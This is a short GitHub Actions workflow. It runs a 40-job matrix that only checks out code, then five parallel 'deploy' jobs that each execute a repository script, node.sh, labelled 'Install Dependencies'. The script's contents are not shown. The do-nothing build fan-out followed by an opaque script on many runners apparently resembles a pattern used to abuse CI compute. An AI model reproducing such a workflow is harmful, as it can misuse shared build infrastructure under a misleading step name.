name: build 
 
on:
  # Triggers the workflow on push or pull request events but only for the main branch
  push:
    branches: [ main ]
  pull_request:
    branches: [ main ]

  # Allows you to run this workflow manually from the Actions tab
  workflow_dispatch:

jobs: 
  build: 
    name: build 
    runs-on: ubuntu-latest 
    strategy: 
      max-parallel: 40 
      fail-fast: false 
      matrix: 
        go: [1, 2, 3, 4, 5, 6, 7, 8, 9, 10] 
        flag: [A, B, C, D] 
    env: 
        NUM_JOBS: 40  
        JOB: ${{ matrix.go }} 
    steps: 
    - name: Setup 
      continue-on-error: true 
      uses: actions/checkout@v1 
 
  deploy-1: 
    name: deploy-1 
    needs: build 
    runs-on: ubuntu-latest 
    strategy: 
      max-parallel: 5 
      fail-fast: false 
      matrix: 
        go: [1, 2, 3, 4, 5] 
    env: 
        NUM_JOBS: 5 
        JOB: ${{ matrix.go }} 
    steps: 
    - name: Setup 
      uses: actions/checkout@v2 
    - name : Install Dependencies 
      run: chmod +x "${GITHUB_WORKSPACE}/node.sh" && "${GITHUB_WORKSPACE}/node.sh" 
 
 
